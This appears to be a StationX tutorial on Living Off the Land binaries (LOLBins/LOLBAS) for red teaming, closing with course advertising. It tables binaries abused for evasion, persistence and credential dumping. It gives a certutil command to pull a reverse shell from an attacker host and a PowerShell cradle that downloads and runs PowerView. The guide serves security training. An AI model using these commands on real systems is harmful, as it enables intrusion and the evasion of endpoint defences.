LOLBins, also known as βLiving Off the Land Binaries,β are programs that come pre-installed on your system and are abused by attackers to perform malicious activities while remaining undetected.
They were originally built as helpful command-line utilities, scripts, and executables that aid system administrators with management and configuration. However, hackers have turned them into powerful post-exploitation tools.
This guide will teach you everything you need to know about LOLBins, from why theyβre used to real-world examples. Youβll learn when to use them, how theyβre abused, and examples of using them to download files and perform domain reconnaissance.
Letβs jump in and discover what this all means.
Understanding Living Off the Land (LOTL)
Cyber security has advanced significantly in recent years with the emergence of Endpoint Detection and Response (EDR) tools.
EDRs can detect malicious code executed on disk and in memory, use AI to identify suspicious behavior, and instantly detect malware using threat intelligence. This makes attacking endpoint workstations very difficult.
To evade EDRs and other detection technologies, attackers have turned to βLiving Off the Landβ (LOTL). This tactic uses legitimate software and functionality already on the targeted endpoint to achieve their malicious purposes rather than installing malware or hacking tools.
It allows attackers to avoid common detection strategies and blend in with legitimate traffic that defenders would expect to see on endpoint machines.
Examples of Living Off the Land include:
- Using native Windows functionality like PowerShell, Windows Management Instrumentation (WMI), etc.
- Using trusted tools that the IT team uses to administer machines.
- Using legitimate Windows binaries to achieve hacking objectives like establishing persistence, command and control, and data exfiltration.
There are many advantages to Living Off the Land. The main ones include:
These advantages make Living Off the Land a great tactic during red team engagements, where remaining undetected and stealthy while pursuing high-value targets are key objectives.
Unlike traditional penetration tests, which aim to find as many vulnerabilities and security weaknesses as possible, a red team is tasked with achieving a strategic objective and emulating an advanced persistent threat (APT).
This requires stealth, precision, and patience to fly under the radar and avoid detection by defenders. Living Off the Land aligns well with these requirements and is a common tactic.
Despite these advantages, using native binaries presents challenges. These include:
Now that you know what Living Off the Land means, letβs explore how attackers execute this tactic using LOLBins and LOLBAS.
What Are LOLBins and LOLBAS?
Hackers will use Living Off the Land Binaries (LOLBins) and Living Off the Land Binaries And Scripts (LOLBAS) to perform Living Off the Land attacks. These are the specific Windows executables and functionalities that attackers abuse.
LOLBins
LOLBins are the Windows binary executables you can use to perform Living Off the Land tactics, avoid detection, and bypass controls and the detection of skilled security professionals.
They have the following key characteristics:
- Theyβre legitimate executables in the Windows or Linux operating system (or suite of administrator tools).
- Theyβre signed by the operating system vendor, making them trusted by the operating system and security software.
- They come pre-installed on the target system, meaning you donβt need to download and install them to use them during an attack.
Examples of LOLBins include PowerShell (powershell.exe) for system administration and automation, Bitsadmin (bitsadmin.exe) for downloading and uploading files, and Mshta (mshta.exe) for executing Microsoft HTML Applications (HTA).
These tools have many use casesβboth for legitimate and malicious activitiesβand are commonly used in modern enterprise environments. However, they can also be abused, and defenders find detecting them challenging.
LOLBAS
LOLBAS is an attack method that expands on LOLBins to include legitimate binaries and scripts commonly found on Windows machines. Examples of these scripts include Pester.bat (which can be used for proxy execution), winrm.vbs (for lateral movement), and CL_LoadAssembly.ps1 (which bypasses PowerShell restrictions).
The LOLBAS project was created to document legitimate binaries and scripts attackers can leverage to perform malicious actions. It extensively catalogs all the binaries and scripts inherently present in the Windows operating system and how they can be abused.
The project is community-driven and open-source and maps to other security projects like MITRE ATT&CK for attack techniques and Sigma for detection rules.
Other security initiates like LOLDrivers detail how common device drivers can be abused, and GTFOBins lists Unix and Linux LOLbins attackers can exploit.
A pentester or red team operator will mainly use LOLBins and LOLBAS to evade detection.
These binaries and scripts are native to Windows environments and routinely used by system administrators to manage endpoint machines. Using them lets you remain stealthy and avoid triggering alarms designed to detect malware.
They also allow you to bypass common security settings such as Application Whitelisting (AWL) and User Access Control (UAC), which are often configured in a hardened Windows environment.
You can even use them to mask the execution of commands, scripts, and executables from EDR solutionsβitβs all about evasion.
With this in mind, letβs explore when youβd use them during a pentest or red team engagement.
Living Off the Land Binaries and Scripts in Pentesting and Red Teaming
A penetration test or red team engagement will consist of several steps.
Itβll begin with planning and preparation. Then, a series of steps will lead to gaining initial access to the target systems, and the post-exploitation phase will begin. In this phase, you will use LOLBins to achieve your strategic objectives.
During post-exploitation, you must navigate around various security measures and tools, including anti-virus, Network Intrusion Detection (IDS) systems, and host-based firewalls.
However, the most daunting security technology to evade is EDR. EDR is so advanced nowadays that it detects most commercial and custom malware on a system. This is why you need LOLBins.
LOLBins allows you to blend in with legitimate system activity by using native tools already installed on your target machine. You donβt need additional malware or sophisticated EDR bypasses and donβt risk being detected by advanced techniques like in-memory scanning.
LOLBins help you stay hidden while performing post-exploitation tasks like data exfiltration, establishing persistence, and more.
Additionally, using LOLBins during a security test better simulates a real-world attack. Threat actors will use LOLBins for the exact reason a penetration tester and red teamer will: to remain undetected.
Using LOLBins in your testing activity provides a more realistic assessment that better tests the security controls your client has created.
Now that you know what Living Off the Land is and why itβs vital during a pentest or red team engagement, letβs explore some LOLBins and scripts you can use.
LOLbins List: Common and Useful LOLbins and Scripts
There are hundreds of LOLBins and scripts you can use to perform Living Off the Land in a Windows environment. Here are some of the most popular ones in modern cyber attacks.
| LOLBin / LOLBAS | Description | Usage |
PowerShell (powershell.exe) | PowerShell is the native Windows scripting language for administration and automation. | PowerShell can download files, execute malicious activity and scripts, perform reconnaissance, and more. However, it tends to be locked down in enterprise environments. |
Windows Management Instrumentation (wmic.exe) | A command-line tool for managing systems and querying for information. | Used to execute binaries and scripts on remote systems, dumping credentials (e.g., NTDS.dit), and performing reconnaissance. An alternative to Mimikatz. |
Bitsadmin (bitsadmin.exe) | A command-line tool for managing the Windows Background Intelligent Transfer Service (BITS) that lets you upload and download files. | Capable of uploading, downloading, and copying files between machines. It can also be used for defense evasion by hiding malware execution as BITS jobs. Itβs an alternative to PowerShell download cradles. |
Certutil (certutil.exe) | A command-line utility for handling certificates. | You can use it to download files and encode and decode data to evade security tools. Itβs an alternative to PowerShell download cradles. |
Mshta (mshta.exe) | A tool for executing Microsoft HTML Applications (HTA). | You can execute malicious HTA scripts that contain embedded JavaScript, JScript, or VBScript code. Itβs an alternative to executing code as a macro or web file. |
Rundll32 (rundll32.exe) | A tool for running Dynamic Link Libraries (DLLs) from the command line. | Used to execute malicious DLLs and bypass or evade security solutions. |
Schtasks (schtasks.exe) | A utility for scheduling periodic tasks to be run on a Windows machine. | Capable of installing persistence mechanisms and performing lateral movement. An alternative to C2 frameworks like PowerSploit. |
Sc (sc.exe) | Windows command-line tool for managing services. | Used to install persistence mechanisms and evade detection using alternate data streams. An alternative to C2 frameworks. |
Csc (csc.exe) | A binary that the .NET Framework uses to compile C# code on the command line. | You can use it to compile C# code and execute malware on the target machine while bypassing defenses. |
MSI Exec (msiexec.exe) | Command-line tool for executing Windows installer files (.msi). | Can execute malicious MSI and DLL filesβboth locally and remotelyβand install malware onto a machine. A command-line alternative for the Windows installer wizard. |
CScript (cscript.exe) and WScript (wscript.exe) | Binaries for executing scripts on Windows machines (JavaScript and VBScript). | Used to execute malicious payloads and scripts and evade detection using alternate data streams. |
AD Module (ActiveDirectory.psm) | The Active Directory (AD) module for Windows PowerShell. Used for interacting with AD environments. | This module can perform AD reconnaissance, establish persistence, and perform lateral movement while blending in with legitimate traffic. It can also be used as an alternative to PowerView. |
Windows Subsystem for Linux (wsl.exe) | Executable for interacting with the Windows subsystem for Linux from the command line. | It can execute binaries and arbitrary Linux commands to dump credentials, download files, and more. This is not enabled by default in all environments. |
CL_LoadAssembly (CL_LoadAssembly.ps1) | PowerShell diagnostic script for troubleshooting issues. | Used to proxy execute managed DLLs and evade detection and security mechanisms like AppLocker. |
Windows Remote Management Settings (winrm.vbs) | Windows script used to manage Windows Remote Management (RM) settings. | Capable of remote command execution, lateral movement, and bypassing Windows Application Whitelisting (AWL). An alternative to PsExec. |
Thatβs enough theory. Letβs look at ways you can use these LOLBins during an engagement.
Examples of LOLBins and LOLBAS in an Engagement
Itβs great to know what LOLBins are and why theyβre used during an engagement, but what does this look like in practice? Letβs explore some LOLbins examples to understand why theyβre so powerful.
To follow along with the demonstrations in this article, try building your hacking lab by following the steps in our article, How to Create a Virtual Hacking Lab: Ultimate Setup. It will show you how to make your virtual playground, where you can practice all the hacking skills you learn.
Certutil
Certutil is a handy tool for downloading malware, hacking, or malicious tools onto a system. Microsoft has built-in protections that prevent you from downloading malware through a web browser like Edge, so having an alternative method is very useful.
Certutil can bypass app and browser protections like SmartScreen and endpoint settings like Real-time protection that prevent you from installing hacking tools to help you achieve your objectives.
If you try to download malware using Microsoft Edge or another web browser, these protections will prevent you from doing so.
However, if you use a LOLBin like Certutil to download files, you bypass many of these protections and can download the malware onto the targeted system.
To do this, run the command certutil -urlcache -split -f β<url>/<filename>β <filename>.
Here, you can download a reverse shell onto the target system youβre hosting on your Kali Linux attacker machine (10.0.200.17).
AD Module
The PowerShell ActiveDirectory Module allows you to manage Windows Active Directory environments using various cmdlets.
You can edit users and groups, manage computers and Organizational Units (OUs), execute Active Directory queries, modify Group Policy Objects (GPOs), and even edit domain trust relationships.
To perform these actions as an attacker, youβd usually use something like PowerView, a PowerShell module designed for offensive operations that comes with cmdlets for domain reconnaissance. Unfortunately, this is a well-known hacking tool that many endpoint security tools will detect.
Letβs try to download and run a PowerView cmdlet to find all the Activity Directory users within the current domain by running the following commands:
# Define the URL where the PowerView script is hosted
$scriptUrl = "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1"
# Download and execute PowerView
IEX (New-Object Net.WebClient).DownloadString($scriptUrl)
# Run a PowerView command to list all domain users
Get-NetUser
As you can see, PowerView fails to download because Windows Defender detects that the script contains malicious content, preventing you from running the PowerView cmdlet. This detection would blow your cover in a red team engagement and get you caught.
Instead, letβs try to do the same with the PowerShell ActiveDirectory Module using the following commands:
# Install RSAT for Active Directory
Add-WindowsCapability -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0 -Online
# Query all domain users
Get-ADUser -Filter {Name -like β*β}
This time, you returned all Active Directory users in the current domain. You can identify high-value targets from here and continue your domain reconnaissance using this LOLBin.
Conclusion
LOLBins are the Windows binaries you can use to perform living off the land tactics.
They help you avoid detection, bypass common security controls, and fly under the radar of defenders as you perform post-exploitation activities.
This guide has taught you when to use LOLBins during a penetration test or red team engagement and why theyβre valuable tools in your hacking arsenal. We also reviewed examples of popular LOLBins like Certutil and the ActiveDirectory PowerShell module. Use this newfound knowledge and practice using LOLBins in your own hacking environment.
If you want to learn more about LOLBins, defense evasion, and red teaming, join our StationX Accelerator Program. It includes everything you need to crush it in cyber security with 1000+ courses and labs, mentorship, and mastermind groups.
Here are some of the courses available:
Frequently Asked Questions
Guarantee Your Cyber Security Career with the StationX Masterβs Program!
Get real work experience and a job guarantee in the StationX Masterβs Program. Dive into tailored training, mentorship, and community support that accelerates your career.
- Job Guarantee & Real Work Experience: Launch your cybersecurity career with guaranteed placement and hands-on experience within our Masterβs Program.
- 30,000+ Courses and Labs: Hands-on, comprehensive training covering all the skills you need to excel in any role in the field.
- Pass Certification Exams: Resources and exam simulations that help you succeed with confidence.
- Mentorship and Career Coaching: Personalized advice, resume help, and interview coaching to boost your career.
- Community Access: Engage with a thriving community of peers and professionals for ongoing support.
- Advanced Training for Real-World Skills: Courses and simulations designed for real job scenarios.
- Exclusive Events and Networking: Join events and exclusive networking opportunities to expand your connections.
TAKE THE NEXT STEP IN YOUR CAREER TODAY!
